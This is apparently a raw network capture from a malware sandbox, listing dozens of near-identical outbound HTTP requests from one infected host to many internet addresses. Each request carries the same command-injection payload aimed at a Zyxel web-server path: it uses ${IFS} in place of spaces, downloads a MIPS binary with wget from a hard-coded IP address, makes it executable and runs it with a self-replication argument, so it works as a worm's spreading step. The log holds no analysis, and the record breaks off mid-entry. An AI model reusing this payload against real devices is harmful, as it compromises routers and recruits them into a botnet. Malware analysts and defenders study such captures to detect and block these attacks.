                                                  Jan 19, 2024 18:23:43.806490898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1605192.168.2.1339336118.38.71.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806531906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1606192.168.2.1359820218.154.80.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806595087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1607192.168.2.1350502120.62.56.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806624889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1608192.168.2.1347478101.131.142.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806653976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1609192.168.2.1342938213.219.253.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806690931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1610192.168.2.1348652202.67.49.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806749105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1611192.168.2.1344578193.145.113.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806793928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1612192.168.2.135725266.29.28.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806797981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1613192.168.2.133301881.30.180.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806874990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1614192.168.2.1348272132.198.219.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806919098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1615192.168.2.135754298.28.122.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806935072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1616192.168.2.1344756124.65.219.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.806968927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1617192.168.2.1354562210.191.182.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.807023048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1618192.168.2.1335974179.94.236.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.818700075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1619192.168.2.1334908192.201.255.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.818741083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1620192.168.2.134972877.21.188.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.818782091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1621192.168.2.1360122180.65.183.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.818821907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1622192.168.2.1351076151.180.248.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.818876028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1623192.168.2.135201480.94.49.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.818908930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1624192.168.2.1359456206.78.195.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.818954945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1625192.168.2.1351700189.197.192.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819013119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1626192.168.2.134051247.209.231.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819051027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1627192.168.2.1334218221.40.79.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819101095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1628192.168.2.1351596136.145.30.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819133043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1629192.168.2.1360474186.116.199.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819159031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1630192.168.2.1347152189.184.26.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819192886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1631192.168.2.1337492102.160.148.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819217920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1632192.168.2.1357194137.216.181.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819257021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1633192.168.2.1355718164.159.55.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819278002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1634192.168.2.133695889.103.161.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819304943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1635192.168.2.134047240.217.58.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819341898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1636192.168.2.1335938186.67.119.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819375992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1637192.168.2.1350526178.66.199.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819430113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1638192.168.2.1348622109.57.224.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819484949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1639192.168.2.1341502205.216.208.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819521904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1640192.168.2.135066823.188.182.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819555044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1641192.168.2.135908444.84.87.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819610119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1642192.168.2.1356722138.220.125.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819639921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1643192.168.2.1341302133.198.13.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819684982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1644192.168.2.1335976194.204.147.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819708109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1645192.168.2.1341460199.208.141.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819755077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1646192.168.2.1342076205.189.207.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819792032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1647192.168.2.1338594123.93.206.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819835901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1648192.168.2.135730873.107.209.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819869995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1649192.168.2.1344110131.240.205.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819919109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1650192.168.2.135448278.59.19.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819955111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1651192.168.2.135396679.53.185.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.819993973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1652192.168.2.135479096.75.67.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820024967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1653192.168.2.1334952138.150.183.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820077896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1654192.168.2.134863253.54.222.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820110083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1655192.168.2.134340083.249.243.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820163012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1656192.168.2.1341650144.32.20.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820198059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1657192.168.2.1357352107.26.118.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820230007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1658192.168.2.1350606119.132.153.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820291996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1659192.168.2.1338698196.250.130.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820322990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1660192.168.2.1356576162.21.63.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820374966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1661192.168.2.135259674.129.248.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820403099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1662192.168.2.1352230162.203.51.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820435047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1663192.168.2.1343828156.101.102.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820472002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1664192.168.2.1357306117.202.151.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820502043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1665192.168.2.13535741.163.202.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820544004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1666192.168.2.135167276.51.203.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.820576906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1667192.168.2.1355852190.238.217.49443
                                                  TimestampBytes transferredDirectionData
